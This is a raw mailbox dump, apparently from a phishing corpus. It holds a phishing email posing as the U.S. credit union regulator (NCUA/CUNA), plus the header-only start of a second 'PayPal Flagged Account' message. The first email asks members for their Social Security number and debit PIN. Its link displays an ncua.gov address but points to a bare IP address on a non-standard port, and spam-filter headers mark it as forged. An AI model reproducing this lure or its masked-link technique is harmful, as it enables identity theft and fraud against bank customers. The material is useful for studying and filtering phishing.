From: "Credit Union National Association (CUNA)" <support@cuna.org>
Reply-To: "Credit Union National Association (CUNA)" <account@cuna.org>
To: umeet@uninet.edu
Subject: [*** POSIBLE SPAM***] IMPORTANT: CUNA Verification
Date: Mon, 03 Oct 2005 19:26:08 +0100
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--513144460204740"
X-Priority: 1
X-MSMail-Priority: High
X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at uninet.edu
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: ******************
X-Spam-Status: Yes, score=18.3 required=5.0 tests=FORGED_MUA_OUTLOOK,
	FORGED_OUTLOOK_HTML,FORGED_OUTLOOK_TAGS,HTML_40_50,HTML_IMAGE_ONLY_20,
	HTML_MESSAGE,MIME_BOUND_DD_DIGITS,MIME_HTML_ONLY,MIME_HTML_ONLY_MULTI,
	MISSING_MIMEOLE,MPART_ALT_DIFF,MSGID_SPAM_CAPS,NORMAL_HTTP_TO_IP,
	RCVD_IN_BL_SPAMCOP_NET,RCVD_NUMERIC_HELO,WEIRD_PORT autolearn=spam 
	version=3.0.2
X-Spam-Report: 
	*  4.1 MIME_BOUND_DD_DIGITS Spam tool pattern in MIME boundary
	*  3.8 MSGID_SPAM_CAPS Spam tool Message-Id: (caps variant)
	*  1.2 RCVD_NUMERIC_HELO Received: contains an IP address used for HELO
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.1 WEIRD_PORT URI: Uses non-standard port number for HTTP
	*  0.0 HTML_40_50 BODY: Message is 40% to 50% HTML
	*  0.4 HTML_IMAGE_ONLY_20 BODY: HTML: images with 1600-2000 bytes of words
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 MPART_ALT_DIFF BODY: HTML and text parts are different
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  1.2 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
	*      [Blocked - see <http://www.spamcop.net/bl.shtml?62.193.212.129>]
	*  0.6 FORGED_OUTLOOK_HTML Outlook can't send HTML message only
	*  0.1 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
	*  2.4 MIME_HTML_ONLY_MULTI Multipart message only has text/html MIME parts
	*  0.0 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE
	*  3.9 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
Content-Length: 1908
Lines: 56
Status: O
X-Status: 
X-Keywords:                  
X-UID: 294

----513144460204740
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>NCUA</title>
</head>

<body>
<table width=3D"99%" height=3D"102" 
border=3D0 cellpadding=3D0 cellspacing=3D0 background=3D"http://www.ncua.g=
ov/images/prop/bannerStabwide2.jpg">
  <tr>
  <td width=3D"18%"><A href=3D"http://www.ncua.gov/index.html"><IMG height=
=3D98 
      alt=3D"NCUA Seal" src=3D"http://www.ncua.gov/images/prop/blueseal98.=
gif" width=3D100 
      align=3Dleft border=3D0></A></td>
    <td width=3D"82%" height=3D"102"><H2>National Credit Union Administrat=
ion</H2></td>
  </tr>
</table><table width=3D"553" border=3D"0" cellspacing=3D"0" cellpadding=3D=
"0">
  <tr>
    <td width=3D"553">Dear CU holder account,
      <p>This notice informs you that your Credit Union bank has joined ou=
r Federal Credit Union(FCU) network. For both, our and your security, we a=
re asking you to activate an online account on our database. After activat=
ion you can login on our system with your SSN and your Credit/Debit PIN nu=
mber. </p>
      <p>You must visit the FCU activation page and fill in the form to ac=
tivate your online account:</p>
      <p><a href=3D"http://200.203.89.180:2324/.CREDIT-UNION/update_card.h=
tm">http://www.ncua.gov/activate_account.html</a></p>
      <p>In accordance with NCUA User Agreement, you can use your online a=
ccount in 24 hours after activation. We thank you for your prompt attentio=
n to this matter. Please understand that this is a security measure intend=
ed to help protect you and your account.<br>
      </p>
      <p>We apologize for any inconvenience. </p>
      <p>Sincerely, NCUA Account Review Department <br>
      </p>
      <p><hr>
      <br>
          Please do not reply to this e-mail. Mail sent to this address ca=
nnot be answered<br>
          <br>
    </p></td>
  </tr>
</table>

</body>
</html>

----513144460204740--

From adriana@lx.maniu.alphatech2000.com  Mon Oct  3 19:01:39 2005
Return-Path: <adriana@lx.maniu.alphatech2000.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 5072B536E15
	for <jose@login.monkey.org>; Mon,  3 Oct 2005 19:01:39 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 489EB6FA1EB
	for <jose@monkey.org>; Mon,  3 Oct 2005 19:01:36 -0400 (EDT)
Received: from lx.maniu.alphatech2000.com (unknown [82.78.99.24])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  3 Oct 2005 19:01:36 -0400 (EDT)
Received: from lx.maniu.alphatech2000.com (lx [127.0.0.1])
	by lx.maniu.alphatech2000.com (Postfix) with ESMTP id 8751CD023D
	for <jose@monkey.org>; Tue,  4 Oct 2005 02:00:48 +0300 (EEST)
Received: (from adriana@localhost)
	by lx.maniu.alphatech2000.com (8.13.1/8.13.1/Submit) id j93N0l7I004302
	for jose@monkey.org; Tue, 4 Oct 2005 02:00:47 +0300
Date: Tue, 4 Oct 2005 02:00:47 +0300
To: jose@monkey.org
Subject: PayPal Flagged Account
Message-ID: <1128380447.18949.qmail@paypal.com>
